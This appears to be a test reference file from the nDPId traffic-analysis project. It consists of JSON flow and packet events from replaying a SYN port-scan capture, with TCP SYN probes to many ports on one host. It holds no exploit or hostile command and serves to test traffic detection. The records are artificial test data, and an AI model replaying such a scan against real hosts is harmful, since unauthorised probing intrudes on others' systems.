+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":974,"source":"synscan.pcap","alias":"nDPId-test","flow_id":965,"flow_packet_id":1,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059962,"pkt":"ACYLMQczACWzv5HuCABFAAAs0uwAACgGTYasEAAIQA2GNIzTDkvdU4MZAAAAAGACBAAmQQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":975,"source":"synscan.pcap","alias":"nDPId-test","flow_id":966,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059962,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":975,"source":"synscan.pcap","alias":"nDPId-test","flow_id":966,"flow_packet_id":1,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059962,"pkt":"ACYLMQczACWzv5HuCABFAAAsk78AADoGerOsEAAIQA2GNIzTE8TdU4MZAAAAAGACDAAYyAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":976,"source":"synscan.pcap","alias":"nDPId-test","flow_id":967,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059962,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":976,"source":"synscan.pcap","alias":"nDPId-test","flow_id":967,"flow_packet_id":1,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059962,"pkt":"ACYLMQczACWzv5HuCABFAAAsgW4AADIGlQSsEAAIQA2GNIzTRnjdU4MZAAAAAGACDADmEwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":977,"source":"synscan.pcap","alias":"nDPId-test","flow_id":968,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059962,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5120,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":977,"source":"synscan.pcap","alias":"nDPId-test","flow_id":968,"flow_packet_id":1,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059962,"pkt":"ACYLMQczACWzv5HuCABFAAAsvXkAACYGZPmsEAAIQA2GNIzTFADdU4MZAAAAAGACDAAYjAAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":978,"source":"synscan.pcap","alias":"nDPId-test","flow_id":969,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059962,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":978,"source":"synscan.pcap","alias":"nDPId-test","flow_id":969,"flow_packet_id":1,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059962,"pkt":"ACYLMQczACWzv5HuCABFAAAsehoAADYGmFisEAAIQA2GNIzTAfTdU4MZAAAAAGACDAAqmAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":979,"source":"synscan.pcap","alias":"nDPId-test","flow_id":970,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059962,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34571,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":979,"source":"synscan.pcap","alias":"nDPId-test","flow_id":970,"flow_packet_id":1,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059962,"pkt":"ACYLMQczACWzv5HuCABFAAAs6wMAACUGOG+sEAAIQA2GNIzThwvdU4MZAAAAAGACCACpgAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":980,"source":"synscan.pcap","alias":"nDPId-test","flow_id":971,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059962,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6881,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":980,"source":"synscan.pcap","alias":"nDPId-test","flow_id":971,"flow_packet_id":1,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059962,"pkt":"ACYLMQczACWzv5HuCABFAAAsJQUAADgG622sEAAIQA2GNIzTGuHdU4MZAAAAAGACBAAZqwAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":981,"source":"synscan.pcap","alias":"nDPId-test","flow_id":972,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059962,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":898,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":981,"source":"synscan.pcap","alias":"nDPId-test","flow_id":972,"flow_packet_id":1,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059962,"pkt":"ACYLMQczACWzv5HuCABFAAAsQ0wAADYGzyasEAAIQA2GNIzTA4LdU4MZAAAAAGACDAApCgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":982,"source":"synscan.pcap","alias":"nDPId-test","flow_id":973,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059962,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1164,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":982,"source":"synscan.pcap","alias":"nDPId-test","flow_id":973,"flow_packet_id":1,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059962,"pkt":"ACYLMQczACWzv5HuCABFAAAsO3sAADAG3PesEAAIQA2GNIzTBIzdU4MZAAAAAGACBAAwAAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":983,"source":"synscan.pcap","alias":"nDPId-test","flow_id":974,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":983,"source":"synscan.pcap","alias":"nDPId-test","flow_id":974,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsDxoAAC0GDFmsEAAIQA2GNIzTH0rdU4MZAAAAAGACCAARQgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":984,"source":"synscan.pcap","alias":"nDPId-test","flow_id":975,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":984,"source":"synscan.pcap","alias":"nDPId-test","flow_id":975,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsJpAAADIG7+KsEAAIQA2GNIzTxnDdU4MZAAAAAGACDABmGwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":985,"source":"synscan.pcap","alias":"nDPId-test","flow_id":976,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":985,"source":"synscan.pcap","alias":"nDPId-test","flow_id":976,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsddgAADIGoJqsEAAIQA2GNIzTCP3dU4MZAAAAAGACDAAjjwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":986,"source":"synscan.pcap","alias":"nDPId-test","flow_id":977,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9618,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":986,"source":"synscan.pcap","alias":"nDPId-test","flow_id":977,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsId8AADoG7JOsEAAIQA2GNIzTJZLdU4MZAAAAAGACDAAG+gAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":987,"source":"synscan.pcap","alias":"nDPId-test","flow_id":978,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":987,"source":"synscan.pcap","alias":"nDPId-test","flow_id":978,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsc6IAACoGqtCsEAAIQA2GNIzTrZvdU4MZAAAAAGACDAB+8AAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":988,"source":"synscan.pcap","alias":"nDPId-test","flow_id":979,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14441,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":988,"source":"synscan.pcap","alias":"nDPId-test","flow_id":979,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAspioAAC0GdUisEAAIQA2GNIzTOGndU4MZAAAAAGACCAD4IgAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":989,"source":"synscan.pcap","alias":"nDPId-test","flow_id":980,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4279,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":989,"source":"synscan.pcap","alias":"nDPId-test","flow_id":980,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsiV0AADMGjBWsEAAIQA2GNIzTELfdU4MZAAAAAGACEAAX1QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":990,"source":"synscan.pcap","alias":"nDPId-test","flow_id":981,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":990,"source":"synscan.pcap","alias":"nDPId-test","flow_id":981,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsDLwAADEGCresEAAIQA2GNIzTH\/TdU4MZAAAAAGACCAAQmAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":991,"source":"synscan.pcap","alias":"nDPId-test","flow_id":982,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5679,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":991,"source":"synscan.pcap","alias":"nDPId-test","flow_id":982,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAslZYAADIGgNysEAAIQA2GNIzTFi\/dU4MZAAAAAGACDAAWXQAAAgQFtA=="} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":992,"source":"synscan.pcap","alias":"nDPId-test","flow_id":983,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":987,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":992,"source":"synscan.pcap","alias":"nDPId-test","flow_id":983,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsq3UAADsGYf2sEAAIQA2GNIzTA9vdU4MZAAAAAGACEAAksQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":993,"source":"synscan.pcap","alias":"nDPId-test","flow_id":984,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":993,"source":"synscan.pcap","alias":"nDPId-test","flow_id":984,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAs8X8AAC4GKPOsEAAIQA2GNIzTHmLdU4MZAAAAAGACDAAOKgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":994,"source":"synscan.pcap","alias":"nDPId-test","flow_id":985,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":31038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":994,"source":"synscan.pcap","alias":"nDPId-test","flow_id":985,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsmB0AADMGfVWsEAAIQA2GNIzSeT7dUoMYAAAAAGACEACvUAAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":995,"source":"synscan.pcap","alias":"nDPId-test","flow_id":986,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":995,"source":"synscan.pcap","alias":"nDPId-test","flow_id":986,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsU8cAACkGy6usEAAIQA2GNIzSLuDdUoMYAAAAAGACCAABrwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":996,"source":"synscan.pcap","alias":"nDPId-test","flow_id":987,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":996,"source":"synscan.pcap","alias":"nDPId-test","flow_id":987,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAsXS0AACwGv0WsEAAIQA2GNIzSKXjdUoMYAAAAAGACBAALFwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":997,"source":"synscan.pcap","alias":"nDPId-test","flow_id":988,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":997,"source":"synscan.pcap","alias":"nDPId-test","flow_id":988,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAsxRsAADcGTFesEAAIQA2GNIzSBCPdUoMYAAAAAGACEAAkbAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":998,"source":"synscan.pcap","alias":"nDPId-test","flow_id":989,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":998,"source":"synscan.pcap","alias":"nDPId-test","flow_id":989,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAsOP4AADQG23SsEAAIQA2GNIzSCizdUoMYAAAAAGACBAAqYwAAAgQFtA=="} 